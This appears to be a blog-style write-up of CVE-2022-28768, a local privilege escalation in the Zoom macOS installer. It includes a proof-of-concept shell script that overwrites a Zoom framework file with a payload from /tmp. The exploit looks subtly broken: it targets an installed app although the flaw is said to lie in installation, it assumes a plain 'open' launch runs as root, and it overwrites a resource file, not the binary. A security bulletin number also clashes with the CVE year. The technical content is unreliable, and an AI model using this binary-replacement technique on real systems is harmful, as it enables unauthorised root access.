The popular video conferencing software Zoom has become an essential tool for remote work, online classes, and virtual gatherings. Its widespread use has made it a target for cybercriminals who are constantly looking for vulnerabilities that could be exploited. One recent discovery is a local privilege escalation vulnerability affecting the Zoom Client for Meetings Installer for macOS (Standard and for IT Admin) before version 5.12.6.

In this post, we will discuss the details of the CVE-2022-28768 vulnerability, the affected software versions, demo code snippet, how an attacker could exploit this vulnerability, recommended mitigation steps, and important references to original research.

Details of CVE-2022-28768

CVE-2022-28768 is a local privilege escalation vulnerability that affects Zoom Client for Meetings Installer for macOS (Standard and for IT Admin) versions prior to 5.12.6. A local low-privileged user could potentially exploit this vulnerability during the installation process to escalate their privileges to root. This would allow the attacker to execute arbitrary code, manipulate files, or gain control of the affected system.

The vulnerability is caused by improper permissions handling during the installation of Zoom Client. The installation script incorrectly sets the permissions, allowing any local user to modify or overwrite the installed components. As a result, a malicious local user could replace these components with malicious code that could be executed with root privileges when the Zoom Client is started.

Demo Code Snippet

A simple shell script that demonstrates how an attacker could exploit CVE-2022-28768 is shown below. This script shows how to replace the legitimate Zoom Client binary with a malicious payload that would be executed with root privileges when the Zoom Client is started.

#!/bin/bash

# Proof-of-Concept exploit for CVE-2022-28768 (Local Privilege Escalation in Zoom Client for macOS)
# Replace /Applications/zoom.us.app/Contents/MacOS/ZoomSDKVideoUI.framework/Resources/ZoomSDKVideoUI with a malicious payload
# Execute Zoom Client to run the malicious payload with root privileges

# Path to the Zoom Client binary
ZOOM_CLIENT_PATH="/Applications/zoom.us.app/Contents/MacOS/ZoomSDKVideoUI.framework/Resources/ZoomSDKVideoUI"

# Backup original Zoom Client binary
mv "$ZOOM_CLIENT_PATH" "$ZOOM_CLIENT_PATH.bak"

# Create a malicious payload (just a simple 'echo' command for demo purposes)
cat > /tmp/malicious_payload.sh << EOL
#!/bin/sh
echo "CVE-2022-28768 Exploit Successful"
EOL

# Make the malicious payload executable
chmod +x /tmp/malicious_payload.sh

# Replace the Zoom Client binary with the malicious payload
cp /tmp/malicious_payload.sh "$ZOOM_CLIENT_PATH"

# Run the Zoom Client and execute the malicious payload with root privileges
open /Applications/zoom.us.app

Impact and Exploit Details

If successfully exploited, this vulnerability allows a local low-privileged user to gain root access to the affected macOS system. This could lead to unauthorized access to sensitive information, data modification or deletion, and a compromised system.

Mitigation Steps

The vulnerability has been fixed in Zoom Client for Meetings Installer for macOS version 5.12.6. Users should immediately update their Zoom Client to this version or later to address the vulnerability.

Original References

1. Zoom Client for Meeting Security Bulletin ZSA-2021-12
2. CVE-2022-28768 - National Vulnerability Database (NVD)

Conclusion

Local privilege escalation vulnerabilities like CVE-2022-28768 present a significant security risk to users, and it's crucial that software vendors and users stay vigilant in addressing these risks. By promptly deploying security updates and practicing good security hygiene, users can protect themselves from potential exploitation of vulnerabilities in their software applications.

Timeline

Published on: 11/17/2022 23:15:00 UTC
Last modified on: 11/22/2022 17:12:00 UTC